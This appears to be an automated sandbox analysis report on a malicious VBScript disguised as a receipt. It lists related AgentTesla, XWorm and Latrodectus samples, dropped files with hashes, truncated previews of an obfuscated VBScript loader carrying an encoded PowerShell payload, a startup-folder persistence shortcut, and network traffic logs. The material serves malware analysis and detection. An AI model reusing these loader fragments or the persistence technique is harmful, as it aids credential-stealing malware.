	FACTURAS-ALBARANES.exe	Get hash	malicious	AgentTesla	Browse	172.67.215.45 131.153.147.50
	http://pixelread.com	Get hash	malicious	Unknown	Browse	172.67.215.45 131.153.147.50
	https://url.us.m.mimecastprotect.com/s/rYQHCYEBgkHWJjw3h0H9oU?domain=urldefense.proofpoint.com	Get hash	malicious	Unknown	Browse	172.67.215.45 131.153.147.50
	ent.exe	Get hash	malicious	XWorm	Browse	172.67.215.45 131.153.147.50
	Order PS24S0040.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.215.45 131.153.147.50
	reports_239900.html	Get hash	malicious	Unknown	Browse	172.67.215.45 131.153.147.50
37f463bf4616ecd445d4a1937da06e19	4365078236450.LnK.lnk	Get hash	malicious	Unknown	Browse	172.67.19.24
	SecuriteInfo.com.Trojan.Siggen22.5496.19647.10510.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	yvg1X8doal.dll	Get hash	malicious	Latrodectus	Browse	172.67.19.24
	6kAOUicqCK.dll	Get hash	malicious	Latrodectus	Browse	172.67.19.24
	GLKJoBXIVE.dll	Get hash	malicious	Latrodectus	Browse	172.67.19.24
	2024 9_45_44 p.m..js	Get hash	malicious	WSHRAT	Browse	172.67.19.24
	2024 9_45_44 p.m..js	Get hash	malicious	WSHRAT	Browse	172.67.19.24
	2024 8_35_29 p.m..js	Get hash	malicious	WSHRAT	Browse	172.67.19.24
	2024 8_35_29 p.m..js	Get hash	malicious	Unknown	Browse	172.67.19.24
	2024_04_005.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.19.24

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\RegSvcs.exe	Transfer copy PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	PO# CV-PO23002552.PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Deposit payment copy PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Approved E-DO PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	PO# CV-PO23002552.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Invoice Checklist.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	H223070141&H223070191.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	overdue Balance.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	New Order INQ-087867.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	proforma invoice PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse

Created / dropped Files

C:\ProgramData\moquenqueiro.vbs

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	437480
Entropy (8bit):	5.105403560005336
Encrypted:	false
SSDEEP:	6144:sVNFUxUwlTY4h4QmIICQ791+yhii4591lF1UflGsZcfb:nINyeOirlc
MD5:	42320E659E8E1885EB96342E52E4EC60
SHA1:	8FF7099935C8375DDC21E19D61FE13AE56BEA2F0
SHA-256:	5FE439B587F246640A61C65F77380EA1EC486EC799C676B10102C2A502EADFA9
SHA-512:	CC35BB7E273C59C39C25FB902E12379A368FAE97C8403C7DF669DB215E57BDB805D649FAA7DB084E13ADE1F4AA3D97F3457E667770EF2F5D489AD9AED214A707
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	Dim FSO, shell, xslProcessor....Sub RunCmd(CommandString, OutputFile).. cmd = "cmd /c " + CommandString + " >> " + OutputFile.. shell.Run cmd, 0, True..End Sub....Sub GetOSInfo(outputFileName).. On Error Resume Next.. strComputer = ".".. HKEY_LOCAL_MACHINE = &H80000002.... Dim objReg, outputFile.. Dim buildDetailNames, buildDetailRegValNames.... buildDetailNames = Array("Product Name", "Version", "Build Lab", "Type").. buildDetailRegValNames = Array("ProductName", "CurrentVersion", "BuildLabEx", "CurrentType").... Set outputFile = FSO.OpenTextFile(outputFileName, 2, True).... Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_.. strComputer & "\root\default:StdRegProv").... outputFile.WriteLine("[Architecture/Processor Information]").. outputFile.WriteLine().. outputFile.Close.. cmd = "cmd /c set processor >> " & outputFileName.. shell.Run cmd, 0, True.... Set outputFile = FSO.OpenTextFile(outpu

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\8RAqVdhv[1].txt

Process:	C:\Windows\System32\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (11817), with CRLF line terminators
Category:	dropped
Size (bytes):	13911
Entropy (8bit):	4.7687188723753415
Encrypted:	false
SSDEEP:	384:rji70XIulnRzmt8mvrPFV5l0Vi2HUZUek9HUZUek2y5yu1vv0RcpmRYBEHd+mrcs:rji7AIYnRqtFjPFV5lWi2HUZUJ9HUZU4
MD5:	42D24836C521D7502388BE36EB8FC16C
SHA1:	B4FD324C7443B7365F37A59A2BCED60F87022005
SHA-256:	C1C53BC384E73E74C824985A0814E61B7EB06796375EB600F9CC2F88744927AC
SHA-512:	4B59FCB83861094C04DD0D1344A40D491ED030A71C804F378AE0BC249DEB6D75CCDDDA26F694F87B3F8DA214E82A0C54FD327AEAD870A97762E615FF42C51D1B
Malicious:	false
Reputation:	low
Preview:	.. dim inaudito , phlebomalacia , abusivamente , endurentar , liminarca , Cama , liminarca1.. phlebomalacia = " ".. abusivamente = "" & endurentar & phlebomalacia & endurentar & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & endurentar & phlebomalacia & endurentar & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & endurentar & phlebomalacia & endurentar & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & endurentar & phlebomalacia & endurentar & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & endurentar & phlebomalacia & endurentar & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & endurentar & phlebomalacia &

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul774/lL:NllUwt
MD5:	3BD40D4BDD7802424FE8F2DC2A41C196
SHA1:	88F355EA9D58C5A00B2EBB0DC3127C0C13052631
SHA-256:	FCF55501F03C9B5E24796B8FE3656143E97D7A5FD0300387C1960C226C74076A
SHA-512:	67734D54D327379C259DB7E0576BE2A4B597CB2F0B9E881AA1FC2B55F375BB5862122579B0B5EC7DED7A7875C2AC7668033355772CBB8311A8A86924153D59B2
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\Log.tmp

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.7195394315431693
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
MD5:	0DB526D48DAB0E640663E4DC0EFE82BA
SHA1:	17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
SHA-256:	934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
SHA-512:	FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]r[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35hq3ecz.3sv.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_meb2bckw.vph.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndz3cgqd.3d5.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqxthlip.gjv.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegSvcs.lnk

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat May 4 06:48:48 2024, mtime=Sat May 4 06:48:48 2024, atime=Sat May 4 06:48:48 2024, length=45984, window=hide
Category:	dropped
Size (bytes):	767
Entropy (8bit):	5.060579886339135
Encrypted:	false
SSDEEP:	12:8Bd24zuo0pnu8Ch2/rAlXIsY//d1rluLtNEyjAf+Hwm8Y6mV:8BBzkDl0lXUFZlItNEOAfk8Fm
MD5:	B7712195B7B661A69B98699884D10214
SHA1:	465BE31A2428DC6AB8072F53BD3FB1D741D3CF96
SHA-256:	8E26F37C7599ED72A3CE63BE6402FFAB5DE020DFF7E221694B4E33280620586F
SHA-512:	53712827B2782E61E64C47B79B6629445268F9C0796A2532D38888F31E209E5AFD4CDDBCF7E8C607A53527D89A70C460221732779F3683EEA25D8C3DE44FB147
Malicious:	false
Preview:	L..................F.... ...ba......ba......ba..............................v.:..DG..Yr?.D..U..k0.&...&.......$..S...c+t\....f...........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X.=...........................^.A.p.p.D.a.t.a...B.V.1......X.=..Roaming.@......EW<2.X.=..../......................IR.R.o.a.m.i.n.g.....b.2......X.> .RegSvcs.exe.H......X.>.X.>..............................R.e.g.S.v.c.s...e.x.e.......\...............-.......[...........B..~.....C:\Users\user\AppData\Roaming\RegSvcs.exe........\.....\.....\.....\.....\.R.e.g.S.v.c.s...e.x.e.`.......X.......965543...........hT..CrF.f4... ..&..Jc...-...-$..hT..CrF.f4... ..&..Jc...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\RegSvcs.exe

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45984
Entropy (8bit):	6.16795797263964
Encrypted:	false
SSDEEP:	768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
MD5:	9D352BC46709F0CB5EC974633A0C3C94
SHA1:	1969771B2F022F9A86D77AC4D4D239BECDF08D07
SHA-256:	2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
SHA-512:	13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Transfer copy PDF.exe, Detection: malicious, Browse Filename: PO# CV-PO23002552.PDF.exe, Detection: malicious, Browse Filename: Deposit payment copy PDF.exe, Detection: malicious, Browse Filename: Approved E-DO PDF.exe, Detection: malicious, Browse Filename: PO# CV-PO23002552.exe, Detection: malicious, Browse Filename: Invoice Checklist.exe, Detection: malicious, Browse Filename: H223070141&H223070191.exe, Detection: malicious, Browse Filename: overdue Balance.exe, Detection: malicious, Browse Filename: New Order INQ-087867.exe, Detection: malicious, Browse Filename: proforma invoice PDF.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........\|...P...........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t........0..(....... ....s$........o%....X..(....-...o&....0...........('......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

**\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON**

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	3.6624034414266404
Encrypted:	false
SSDEEP:	3:49Rk/l9I2Y1AnI/l8lLn:NgGRLn
MD5:	F0F029FBEB423CC6B5361D246DD8E62C
SHA1:	CE0B1F137168D69FB57583167A5E4450E6E5DC58
SHA-256:	D02C73F2EA8305413968C4B3A3317951317BFCD6A752E6FC6A45796423FF9877
SHA-512:	E2F2C5233A150FF30CAEDC85C5EBAEB2FE202A478FC9E1756558D6DE2A0690C5F2E5ADACCE38B54AF6470891586A4C357A3B58014CE98345DB696E3BAF5CAC6A
Malicious:	false
Preview:	....9.6.5.5.4.3.....\MAILSLOT\NET\GETDCCA31264B.................

\Device\Mup\user-PC\PIPE\samr

Process:	C:\Windows\System32\wscript.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.438743916256937
Encrypted:	false
SSDEEP:	3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
MD5:	E467C82627F5E1524FDB4415AF19FC73
SHA1:	B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
SHA-256:	116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
SHA-512:	2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
Malicious:	false
Preview:	................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............

\Device\Mup\user-PC\PIPE\wkssvc

Process:	C:\Windows\System32\wscript.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.577654635909331
Encrypted:	false
SSDEEP:	3:rmHfvtH//Sy3yeM1y73yeUUGk+l91F3ye0Zty:rmHcy3HL73HNGFlXF3HIty
MD5:	86EFD27334586B592E7BFBD0E143C450
SHA1:	E8D1FF64BB20235FD4AF6D8051A4CD4A19B91BDE
SHA-256:	4AA9CA41BA628CDB8E337FCD8929F6BD8D68997E120A8C925BFA1C311AD7DFB4
SHA-512:	3FA13E0456C17D061B40F512CD5615F0B46F82E2095F82C0EB4D1D3E8DAF1ECE475028EB77C78C0FF91E034B745F3FD3C1F0C5AE87FBAEB69F67B1C69F547048
Malicious:	false
Preview:	...................................k...6.3F..~4Z.....]..........+.H`...........k...6.3F..~4Z....3.qq..7I......6...........k...6.3F..~4Z....,..l..@E............

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.415819764111225
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	I7336446-receipt.vbs
File size:	62'688 bytes
MD5:	227c193cad4a20a0ce1b3fcdc8ba6fc0
SHA1:	74810ef49be3f2f8c25a8b701d155a64b6bc443b
SHA256:	a2a48d9351761a8dd7141a32263854377a9975ec29fc17321e4e0b605eb180f7
SHA512:	cbfbbc135f9919c9fe257a891ba4ed16fe9260418e6357e55f4ba81c935acfd6a327d09f6bd9a412e8f3a8e8b2c6e0415cc1781c3bae08dfca430d7fbfb0a139
SSDEEP:	384:FZAaML0ks8ehynpMdwZIRpu3ke6jM1L7Kc0ZyEXJg:7xWidwZIRg3keq9ZBZg
TLSH:	7F536A526BEA2108B5FBBA48997A41344F3779C5AD7DC94E05CC291D0BF3E84CC60BA7
File Content Preview:	..'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....'.....'. .C.o.p.y.r.i.g.h.t. .(.c.). .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n... .A.l.l. .r.i.g.h.t.s. .r

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2024 09:48:21.795689106 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:21.795727015 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:21.795830011 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:21.797895908 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:21.797908068 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:22.128149986 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:22.128242016 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:22.192055941 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:22.192081928 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:22.192461014 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:22.192513943 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:22.194432974 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:22.240130901 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.119956970 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.120008945 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.120023012 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:23.120043993 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.120059013 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:23.120093107 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.120105982 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:23.120112896 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.120141983 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:23.120181084 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:23.120186090 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.120682001 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.120735884 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.120738983 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:23.120762110 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.120779991 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:23.120799065 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.120799065 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:23.120806932 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.120843887 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:23.121555090 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.121608973 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:23.121624947 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.121637106 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:23.121680975 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:23.146330118 CEST	49706	443	192.168.2.6	172.67.19.24
May 4, 2024 09:48:23.146368980 CEST	443	49706	172.67.19.24	192.168.2.6
May 4, 2024 09:48:37.524043083 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:37.524107933 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:37.524195910 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:37.533282042 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:37.533297062 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:37.865880013 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:37.865959883 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:37.868086100 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:37.868097067 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:37.868345022 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:37.874993086 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:37.920114040 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.587852001 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.587902069 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.587935925 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.587968111 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.587975025 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.587994099 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.588012934 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.588027000 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.588066101 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.588073015 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.588469028 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.588500977 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.588545084 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.588551044 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.588624954 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.589236975 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.589292049 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.589328051 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.589329004 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.589339018 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.589370966 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.589977980 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.590164900 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.590190887 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.590209961 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.590214968 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.590253115 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.590914011 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.591124058 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.591167927 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.591173887 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.591888905 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.591922998 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.591928959 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.591933966 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.592005968 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.592010021 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.592833996 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.592871904 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.592876911 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.592883110 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.592916012 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.592921019 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.593671083 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.593719959 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.593724966 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.594665051 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.594696999 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.594734907 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.594736099 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.594743967 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.594774961 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.595485926 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.595516920 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.595534086 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.595540047 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.595572948 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.595581055 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.595587969 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.595642090 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.596339941 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.597373962 CEST	443	49707	172.67.215.45	192.168.2.6
